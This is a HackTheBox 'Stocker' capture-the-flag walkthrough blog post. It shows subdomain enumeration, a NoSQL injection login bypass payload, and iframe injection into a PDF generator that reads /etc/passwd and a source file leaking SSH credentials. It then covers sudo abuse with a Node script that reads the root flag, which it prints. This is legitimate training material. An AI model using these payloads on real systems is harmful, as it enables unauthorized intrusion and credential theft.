Stocker — HackTheBox Machine Simple Writeup | 2023
HackTheBox’s New Machine — Stocker | Walkthrough | Karthikeyan Nagaraj
Make sure to Connect with the Release Arena VPN, Don’t Connect with Normal HackTheBox VPN
Analysis:
- Let’s Start with a Nmap Scan
2. As usual 2 ports are open ssh
andhttp.
So Now let’s Enumerate the http service
3. Before we analyse the http service, Make sure to add the domainstocker.htb
to your/etc/hosts
as this is the domain we need to Enumerate.
4. Let’s Explore the host stocker.htb to further Analyse for anything Interesting
5. Now Let’s Enumerate subdomains using gobuster
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u stocker.htb -t 50 --append-domain
6. Add the domaindev.stocker.htb
to your hosts
7. Inspect the Page
We found a Login page
8. Let’s submit some dummy value and Intercept that traffic
9. Let’s Change the Parameters Format and Content-Type — application/json
{"username":{"$ne":"admin"}, "password":{"$ne":"pass"}}
We got the Below response, the request is redirecting to/stock
10. Now open the/stock
page in Browser
11. Add a Product to the Basket and click Submit Purchase. Make sure to turn your proxy to Intercept that traffic
Response:
12. Let’s try to add a Script to display the Passwords
13. Copy the OrderID and Paste it in the Browser with It’s Corresponding Link
http://dev.stocker.htb/api/po/<orderId>
14. We are displayed with Passwords but the size of<iframe>
is low, so let's Increase Its height and width with the below code
<iframe src=/etc/passwd height=500 width=500></iframe>
15. Now open the Order ID in browser with the OrderID Link
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:113::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:114::/nonexistent:/usr/sbin/nologin
landscape:x:109:116::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
fwupd-refresh:x:112:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
mongodb:x:113:65534::/home/mongodb:/usr/sbin/nologin
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false
16. Send the Request with the below script
"<iframe src=file:///var/www/dev/index.js height=1000px width=1000px></iframe>"
17. We got Username and Password
username: Angoose
Password: IHeardPassphrasesArePrettySecure
18. Login into ssh
19. Checking for Any Files with root Permission using Sudo -l
20. Let’s use the root Permission to display the root Flag. Create a File with nano and add the below code to display the Flag
nano flag.js
const fs = require(‘fs’);
fs.readFile(‘/root/root.txt’, ‘utf8’, (err, data) => {
if (err) throw err;
console.log(data);
});
ClickCtrl+X
andShift+Y
to Save the File
21. Run the js File
We got the Flag
Flag: af0384c294f9e8a52d8ca14415973bbb
Feel Free to Ask Queries via LinkedIn and to Buy me a Coffee : )
Thank you for Reading!!
Happy Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng